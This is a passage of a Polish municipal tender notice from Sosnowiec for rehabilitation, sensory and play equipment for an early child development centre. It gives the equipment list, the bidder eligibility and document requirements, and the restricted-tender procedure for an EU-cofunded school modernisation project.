- parawany medyczne - 3 szt.;
- wałki rehabilitacyjne - 5 szt.;
- kliny rehabilitacyjne - 4 szt.
Część 2 obejmuje nw. wyposażenie:
- zestaw prostopadłościanów - 1 kpl.;
- worek do tańca - 6 szt.;
- woreczki, komplet 6 sztuk - 2 kpl.;
- kamyki - zestaw z 6 różnokolorowymi kamieniami w 2 rozmiarach - 1 kpl.;
- wierzchołki górskie - zestaw 5 sztuk - 1 kpl.;
- tunel ośmiornica - 5-częściowy - 1 kpl.;
- deskorolka owalna do ćwiczenia równowagi oraz koordynacji - 2 szt.;
- konik do skakania - 1 szt.;
- mata do gry w klasy - 1 szt.;
- beczka na zabawki - 3 szt.;
- zestaw gąsienica - tunel dla młodszych dzieci, z różnymi elementami dotykowymi - 1 kpl.;
- zestaw śniadaniowy - 1 kpl.;
- kreatywna plandeka - 1 szt.;
- stół do zabawy w piasku i wodzie, podzielony na mniejsze pojemniki - 1 szt.;
- stół do zabawy w piasku i wodzie, podzielony na 2 części - 1 szt.;
- zbiornik gromadzący wodę - 1 szt.;
- pokrywa do nakrycia - 1 szt.;
- aplikacje do montowania na ścianach lub meblach - 5 szt.;
- ścienne płyty motoryczne - 2 szt.;
- element ścienny - samochód - 1 szt.;
- ścianka kolorowa łąka - 1 szt.;
- wielofunkcyjna kostka do nauki - 1 szt.;
- jaskinia - dżungla - drewniane drzewo z materiałowymi lianami - 1 szt.;
- podwójne płytki do ćwiczeń koncentracji i koordynacji wzrokowo - ruchowej, na każdej płytce 2 obrazki (odbicie lustrzane) - 1 szt.;
- mały grający niedźwiadek - leżąca ósemka do ćwiczeń kinezjologicznych - 1 szt.;
- gra posuń kulą - drewniana tabliczka z labiryntem i kolorowymi rysunkami; kolorowe kule do przesuwania w labiryncie - 1 szt.;
- gra posuń elementy - drewniana tabliczka z labiryntem i kolorowymi rysunkami; kolorowe kule do przesuwania w labiryncie - 1 szt.;
- pudełko do dotykania, pisania itd. - drewniana skrzynka z otworami zasłoniętymi materiałem, do odgadywania ukrytych w niej przedmiotów - 1 szt.;
- ścienna listwa dotykowa - 1 szt.;
- łąka - drewniane kwiaty do składania (typu wieża) - 1 szt.;
- wózek na instrumenty muzyczne - 1 szt.;
- zestaw instrumentów do wózka - 36 instrumentów - 1 kpl.;
- torba z instrumentami muzycznymi - 27 instrumentów - 1 kpl.;
- dwa pudła rezonansowe do grania i słuchania - 1 kpl.;
- magnesy - 4 kpl.;
- zestaw ringo - 1 kpl.;
- wózek na przyrządy - 1 szt.;
- przyrządy, zestaw podstawowy - obręcze, piłki gimnastyczne, ringo, drążki gimnastyczne, stojaki na obręcze, skakanki, liny, balony, pompka do piłek, woreczki z ziarnami fasoli, podkładki, sznurki ołowiane, chusty szyfonowe - 1 kpl.;
- przyrządy, zestaw uzupełniający - piłki lekarskie, kręgle gimnastyczne, półkule drewniane, wstęgi do rytmiki z pałeczką, okrągłe pałki, kolorowe listwy, lina do przeciągania - 1 kpl.;
- piłka z włosami do ćwiczeń koordynacji - 4 szt.;
- piłka do łapania  3 sztuki w zestawie; piłka przywiązana do podbieraka, do ćwiczeń zwinnościowych - 2 szt.;
- aktywna piłka - piłka do ćwiczeń sportowych i rehabilitacyjnych, przezroczysta z kolorowymi kulami w środku, wytwarzającymi dźwięki - 1 szt.;
- piłka do ćwiczeń sportowych i rehabilitacyjnych - 1 szt.;
- piłka żółty fistaszek- piłka do ćwiczeń sportowych i rehabilitacyjnych - 1 szt.;
- wózek składany na ok. 20 piłek - 3 szt.;
- mata obustronna do zawieszenia - 4 szt.;
- uchwyt ścienny na maty - 1 szt.;
- zwijana mata - 1 szt.;
- mata podłogowa - 9 szt.;
- podwójne wrotki z pedałami - 1 szt.;
- kosz na zużyte pieluchy - 2 szt.;
- regał potrójny na pojemniki - 4 szt.;
- pojemniki do regału - 8 szt.;
- ławka, bez oparcia - 4 szt.;
- szafy na pomoce rewalidacyjne - 8 szt.;
- krzesła czarne, obrotowe, z regulacją - 8 szt.;
- stolik sześciokąt do pracy rewalidacyjnej z dziećmi - 8 szt.;
- krzesełka dla dzieci do pracy rewalidacyjnej - 35 szt.;
- ławeczki dla rodziców w poczekalni, potrójne - 3 szt.;
- regał na pomoce dydaktyczne - 4 szt.;
- pudełka na pomoce dydaktyczne - 47 szt.;
- dywany z aplikacjami dydaktycznymi - 6 szt.;
- wieszak do desek sensorycznych - 1 szt.;
- krzyżak z 4 kółkami do budowy różnorodnych przeszkód - 1 szt.;
- klocek z 2 kółkami do budowy różnorodnych przeszkód - 2 szt.;
- deska z grzędami - 1 szt.;
- deska z kulkami - 1 szt.;
- deska z półwałkiem - 1 szt.;
- deska z liną - 1 szt.;
- deska ze szczeciną - 1 szt.;
- deska ze stalą - 1 szt.;
- deska z korytkiem - 1 szt.;
- deska fakira - 1 szt.;
- deska z filcem - 1 szt.;
- deska z kartką - 1 szt.;
- huśtawka balans - 1 szt.;
- przeszkody dla stóp - stawiając nogę za nogę uczestnicy zabawy zgadują co czują: drewno, tworzywo sztuczne, pianka itp.; zawartość: 10 różnie wyposażonych płytek oraz dwie czyste płytki - 1 szt.;
- zestaw antyagresja - 2 kpl.;
- walec do treningów - 1 szt.;
- mata antyuderzeniowa - 4 szt.;
- materac twardy - 2 szt.;
- aplikacje do montowania na ścianie - 11 szt.;
- struktura dłoni i stóp - 2 szt.;
- wózek przewijak z nadstawką - 1 szt.;
- fala dźwiękowa - 1 szt.;
- tunel do wspinaczki - 1 szt.;
- kładka w kształcie fali - 1 szt.;
- zawieszana drabina w kształcie łuku - 1 szt.;
- kropelki na liniach z pętelką do nawlekania - 1 szt.;
- mini kolejka linowa - 1 szt.;
- siatka do wspinania - 1 szt.;
- liny do wspinania się, 3 sztuki w zestawie - 1 kpl.;
- drabinka gimnastyczna podwójna - 1 szt.;
- sieć do wspinania, do zawieszania na drabinkach gimnastycznych - 1 szt.;
- ścianka do wspinania - 1 szt.;
- duże lustro, zamocowane z tyłu drabinki - 1 szt.;
- ścianka wspinaczkowa, prawa - 1 szt.;
- ścianka wspinaczkowa z drążkiem - 1 szt.;
- ścianka wspinaczkowa z chwytami metalowymi - 1 szt.;
- ścianka wspinaczkowa skałki - 1 szt.;
- zjeżdżalnia rolkowa - 1 szt.;
- lustro - 1 szt.;
- ambonka - z dwoma piętrami i 4 szczeblami; dostawa łącznie z 4 karabinkami i 2 pętlami do zawieszenia - 1 szt.;
- konsola czerwona - 6 szt.;
- drążek - 3 szt.;
- falista rura z dzwonkami - element dotykowej poręczy, mocowanej do ściany, której części wywołują różne wrażenia dotykowe u dziecka - 1 szt.;
- drążki z kulkami w siatce - element dotykowej poręczy, mocowanej do ściany, której części wywołują różne wrażenia dotykowe u dziecka - 1 szt.;
- łuk z klockami - element dotykowej poręczy, mocowanej do ściany, której części wywołują różne wrażenia dotykowe u dziecka - 1 szt.;
- drążek z kształtami i figurami - element dotykowej poręczy, mocowanej do ściany, której części wywołują różne wrażenia dotykowe u dziecka - 1 szt.;
- węzeł łączący - element łączący do poręczy - 2 szt.;
- węzeł łączący, końcówka - element zakończeniowy - 3 szt.;
- ścianka edukacyjna - ćwiartka lewa - 1 szt.;
- ścianka edukacyjna - ćwiartka prawa - 1 szt.;
- ścianka edukacyjna - łuk B - 1 szt.;
- lustro ścienne z ramą - 1 szt.;
- domek - zamek ze zjeżdżalnią - 1 szt.;
- ścienne lustro narożnikowe lewe i prawe - 1 kpl.;
- ósemka motoryczna - 1 szt.;
- siedzisko tulipan - 1 szt.;
- magnetyczny stolik - 1 szt.;
- tablica magnetyczna - 1 szt.;
- aplikacja Kret - 1 szt.;
- komplet 4 owalnych desek z wyżłobionymi wgłębieniami - torami, po których toczą się kule - 1 kpl.;
- mata, którą można zwinąć i utworzyć z niej okrąg, w którym dziecko może się toczyć - 1 szt.;
- poduszka z piłkami - 1 szt.;
- miękkie klocki - 20 sztuk w zestawie - 1 kpl.;
- piłka żelowa - 1 szt.;
- chusta animacyjna - 1 szt.;
- mata do raczkowania z piłkami - 1 szt.;
- multi deskorolka - 1 szt.
W odniesieniu do elementów wyposażenia, które wymagają montażu - przedmiot zamówienia obejmuje dostawę wraz z montażem.
Szczegółowy opis przedmiotu zamówienia zostanie określony w Specyfikacji Istotnych Warunków Zamówienia, która przekazana zostanie Wykonawcom wraz z zaproszeniem do złożenia oferty. W odniesieniu do elementów i urządzeń certyfikowanych, Zamawiający będzie wymagał przedłożenia certyfikatów wraz z ofertą.
Ujęte powyżej elementy wyposażenia maja charakter poglądowy. Zamawiający dopuszcza inne rozwiązania - równoważne opisanym, pod warunkiem zachowania przez nie takich samych parametrów jakościowych, funkcjonalnych, użytkowych itp.
UWAGA!
Wykonawca może złożyć wniosek o dopuszczenie do udziału w postępowaniu na jedną lub obie części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.00.00-1, 39.16.21.10-9, 39.16.21.00-6, 39.15.00.00-8, 33.69.30.00-4, 33.19.62.00-2, 39.16.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Niezbędna wiedza i doświadczenie wykonawców ocenione zostanie na podstawie złożonego wraz z wnioskiem wykazu wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, z podaniem rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że dostawy ujęte w wykazie zostały należycie wykonane. Za dostawy potwierdzające spełnianie warunku wiedzy i doświadczenia zamawiający uzna wykonanie co najmniej jednej dostawy pomocy dydaktycznych, sprzętu rehabilitacyjnego lub sprzętu terapeutycznego o wartości nie mniejszej niż 100.000,00 zł (słownie: sto tysięcy złotych 00/100) każda</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby wykonawca posiadał: 
1. środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100) lub dla walut obcych na kwotę w wysokości równoważnej liczonej wg średniego kursu złotego w stosunku do walut obcych, ogłaszanego przez Narodowy Bank Polski, obowiązującego w dniu, w którym opublikowane zostało niniejsze ogłoszenie o zamówieniu w Biuletynie Zamówień Publicznych. Potwierdzeniem spełniania warunku będzie informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków.
2. ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Potwierdzeniem spełniania warunku będzie opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniony i podpisany wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia,
b) W przypadku wspólnego ubiegania się o udzielenie zamówienia przez kilku wykonawców - wykonawca winien załączyć do wniosku o dopuszczenie do udziału w postępowaniu pełnomocnictwo podpisane przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia, złożone w formie oryginału lub notarialnie potwierdzonej kopii,
c) W przypadku ustanowienia przez Wykonawcę pełnomocnika do wniosku o dopuszczenie do udziału w postępowaniu należy załączyć oryginał udzielonego pełnomocnictwa lub notarialnie potwierdzoną jego kopię. Z treści pełnomocnictwa musi jednoznacznie wynikać zakres umocowania do czynności związanych z postępowaniem o udzielenie zamówienia publicznego, w szczególności do podpisania i złożenia wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia i ewentualnie oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>Za ujętą w wykazie wykonanych dostaw w okresie ostatnich trzech lat przed upływem terminu składania wniosków, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie i potwierdzoną dokumentem o należytym wykonaniu dostawę wykonawca otrzyma ocenę - warunek spełnia, za każdą dalszą ujętą w wykazie i potwierdzoną dokumentem o należytym wykonaniu dostawę, wykonawca otrzyma jeden punkt. Pozostałe oceny spełniania warunków zostaną dokonane przez zamawiającego wg formuły spełnia / nie spełnia - w oparciu o analizę treści oświadczeń i dokumentów. Przy ocenie spełniania warunków przez wykonawców występujących wspólnie, dotyczących: - posiadania niezbędnej wiedzy i doświadczenia, - znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający będzie brał pod uwagę łączny potencjał wykonawców występujących wspólnie. Jeżeli liczba wykonawców, którzy spełnią warunki udziału w postępowaniu w zakresie wskazanym przez Zamawiającego w sekcji III.3) będzie mniejsza niż 5, Zamawiający zaprosi do składania ofert wszystkich Wykonawców spełniających te warunki. W przypadku, gdy liczba Wykonawców, którzy wykażą spełnianie warunków udziału w postępowaniu będzie większa niż 5, Zamawiający zaprosi do składania ofert tych wykonawców, którzy uzyskają najwyższą ilość punktów za spełnianie warunków</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień umowy zawartej z wykonawca wyłonionym w toku niniejszego postępowania w przypadku zaistnienia nw. okoliczności:
a) w przypadku zmiany obowiązującego prawa w trakcie realizacji umowy, zamawiający dopuszcza możliwość zmiany wynagrodzenia na skutek zmiany stawki podatku VAT,
b) w przypadku wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a nie wprowadzenie tych zmian powodowałoby niemożność wykonania przedmiotu zamówienia i osiągnięcia założonego celu,
c) w przypadku wystąpienia okoliczności określonych w pkt. b) termin realizacji zamówienia może ulec zmianie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> nie dotyczy<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nie dotyczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2010 godzina 08:30, miejsce: Urząd Miejski w Sosnowcu, Wydział Inwestycji Miejskich, ul. I. Mościckiego 14, pokój nr 129 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej współfinansowany jest ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007 - 2013, Priorytet VIII: Infrastruktura edukacyjna, Działanie 8.2. Infrastruktura placówek oświaty.
Sposób przygotowania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia: 
Wykonawca może złożyć tylko jeden wniosek. Wniosek musi być przygotowany w języku polskim. Wniosek musi zawierać oświadczenie wykonawcy o chęci wzięcia udziału w postępowaniu o udzielenie zamówienia publicznego na dostawę wyposażenia dla potrzeb Centrum Wczesnego Wspomagania Rozwoju Dziecka w ramach zadania inwestycyjnego p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej. Wniosek musi być sporządzony w sposób czytelny, pisemnie na papierze, opieczętowany pieczęcią firmową i pieczęciami imiennymi oraz podpisany przez osoby upoważnione do reprezentowania wykonawcy. Wraz z wnioskiem należy złożyć pełnomocnictwo (o ile prawo do podpisania wniosku nie wynika z innych dokumentów złożonych wraz z wnioskiem) do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać ww. pełnomocnictwo. Pełnomocnik powinien być ustanowiony do reprezentowania wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza. Każdy dokument składany wraz z wnioskiem o dopuszczenie do udziału w postępowaniu sporządzony w innym języku niż język polski powinien być złożony wraz z tłumaczeniem na język polski, poświadczonym za zgodność z oryginałem przez wykonawcę. Oświadczenia wystawiane przez wykonawcę muszą być przedstawione w oryginale i być przez niego podpisane. Dokumenty składane wraz z wnioskiem o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, inne niż pełnomocnictwo, mogą być złożone w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez wykonawcę lub w formie odpisów poświadczonych notarialnie. Poświadczenie za zgodność z oryginałem powinno być sporządzone w sposób umożliwiający identyfikację osoby poświadczającej kopię dokumentu za zgodność z oryginałem (np. imienną pieczątką). Wniosek musi być złożony w trwale zamkniętym opakowaniu z nazwą i dokładnym adresem wykonawcy (dopuszcza się odcisk pieczęci) z następującym opisem: Gmina Sosnowiec, Urząd Miejski - Wydział Inwestycji Miejskich, ul. I. Mościckiego 14, 41-200 Sosnowiec, wniosek o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego na dostawę wyposażenia dla potrzeb Centrum Wczesnego Wspomagania Rozwoju Dziecka w ramach zadania inwestycyjnego p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej. Wnioski, zawiadomienia oraz informacje zamawiający i wykonawcy przekazują pisemnie lub za pomocą faksu, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt jego otrzymania. W przypadku wykonawców wspólnie składających wniosek zamawiający wymaga, aby każdy z wykonawców indywidualnie złożył: oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia określonych w ustawie (art. 22 ust. 1 Pzp) na dostawę wyposażenia dla potrzeb Centrum Wczesnego Wspomagania Rozwoju Dziecka w ramach zadania inwestycyjnego p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej, oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia na dostawę wyposażenia dla potrzeb Centrum Wczesnego Wspomagania Rozwoju Dziecka w ramach zadania inwestycyjnego p.n.: Modernizacja infrastruktury Zespołu Szkół Specjalnych nr 4 w Sosnowcu - rozszerzenie oferty rehabilitacyjno - dydaktycznej - z przyczyn opisanych w art. 24 ust. 1 ustawy stosowne do sytuacji faktycznej wykonawcy oraz stosowne do formy prawnej prowadzonej działalności oraz aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

